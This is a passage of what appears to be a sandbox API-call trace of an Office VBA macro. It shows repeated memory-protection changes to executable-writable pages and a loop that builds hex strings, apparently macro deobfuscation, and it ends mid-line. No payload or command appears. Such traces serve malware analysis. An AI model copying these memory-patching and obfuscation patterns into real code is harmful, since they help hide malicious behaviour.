1 [0105.771] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.772] GetCurrentProcess () returned 0xffffffff [0105.772] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0105.772] GetCurrentProcess () returned 0xffffffff [0105.772] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0105.772] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.773] GetCurrentProcess () returned 0xffffffff [0105.773] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0105.773] GetCurrentProcess () returned 0xffffffff [0105.773] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0105.773] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.775] GetCurrentProcess () returned 0xffffffff [0105.775] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0105.775] GetCurrentProcess () returned 0xffffffff [0105.775] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0105.775] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.777] GetCurrentProcess () returned 0xffffffff [0105.777] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0105.777] GetCurrentProcess () returned 0xffffffff [0105.777] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0105.777] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.778] GetCurrentProcess () returned 0xffffffff [0105.778] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0105.778] GetCurrentProcess () returned 0xffffffff [0105.778] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0105.778] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.779] GetCurrentProcess () returned 0xffffffff [0105.780] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0105.780] GetCurrentProcess () returned 0xffffffff [0105.780] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0105.780] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.780] GetCurrentProcess () returned 0xffffffff [0105.780] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0105.780] GetCurrentProcess () returned 0xffffffff [0105.781] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0105.781] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.781] GetCurrentProcess () returned 0xffffffff [0105.781] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0105.781] GetCurrentProcess () returned 0xffffffff [0105.781] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0105.781] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.783] GetCurrentProcess () returned 0xffffffff [0105.783] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0105.783] GetCurrentProcess () returned 0xffffffff [0105.783] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0105.783] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.783] GetCurrentProcess () returned 0xffffffff [0105.783] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0105.783] GetCurrentProcess () returned 0xffffffff [0105.784] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0105.784] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.784] GetCurrentProcess () returned 0xffffffff [0105.784] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0105.784] GetCurrentProcess () returned 0xffffffff [0105.784] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0105.784] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.786] GetCurrentProcess () returned 0xffffffff [0105.786] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0105.786] GetCurrentProcess () returned 0xffffffff [0105.786] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0105.786] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.787] GetCurrentProcess () returned 0xffffffff [0105.787] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0105.787] GetCurrentProcess () returned 0xffffffff [0105.787] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0105.787] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.788] GetCurrentProcess () returned 0xffffffff [0105.788] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0105.788] GetCurrentProcess () returned 0xffffffff [0105.788] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0105.788] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.789] GetCurrentProcess () returned 0xffffffff [0105.789] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0105.789] GetCurrentProcess () returned 0xffffffff [0105.789] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0105.789] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.789] GetCurrentProcess () returned 0xffffffff [0105.789] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0105.789] GetCurrentProcess () returned 0xffffffff [0105.789] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0105.790] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0105.790] GetCurrentProcess () returned 0xffffffff [0105.790] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0105.790] SetErrorMode (uMode=0x8001) returned 0x8001 [0105.790] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0105.790] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x681f0000 [0105.791] SetErrorMode (uMode=0x8001) returned 0x8001 [0105.791] GetProcAddress (hModule=0x681f0000, lpProcName=0x234) returned 0x683cb15f [0105.793] GetAsyncKeyState (vKey=3) returned 0 [0105.793] GetAsyncKeyState (vKey=3) returned 0 [0105.793] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.793] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.793] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.793] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.793] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.793] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.793] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.793] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.798] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.799] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.799] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.799] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.799] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.799] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.799] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.799] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.799] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.799] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.799] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.799] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.799] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.799] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.800] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.800] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.800] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.800] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.800] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.800] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.800] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.800] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.800] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.800] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.800] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.800] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.800] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.800] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.800] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.801] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.801] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.801] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.801] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.801] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.801] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.801] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.801] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.801] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.801] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.801] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.801] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.801] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.801] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.801] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.801] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.802] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.802] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.802] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.802] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.802] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.802] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.802] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.802] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.802] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.802] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.802] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.802] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.802] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.802] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.802] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.802] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.802] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.803] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.803] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.803] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.803] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.803] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.803] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.803] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.803] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.803] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.803] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.803] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.803] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.803] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.803] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.803] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.803] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.803] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.804] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.804] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.804] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.804] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.804] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.804] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.804] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.804] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.804] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.804] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.804] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.804] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.804] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.805] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.805] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.805] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.805] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.805] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.805] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.805] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.805] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.805] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.805] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.805] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.805] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.805] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.806] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.806] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.806] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.806] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.806] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.806] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.806] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.806] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.806] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.806] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.806] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.806] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.806] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.806] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.807] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.807] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.807] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.807] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.807] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.807] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.807] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.807] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.807] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.807] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.807] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.807] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.807] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.808] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.808] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.808] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.808] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.808] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.808] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.808] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.808] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.808] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.808] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.808] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.808] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.808] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.808] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.808] VarBstrCat (in: bstrLeft="&H", bstrRight="6", 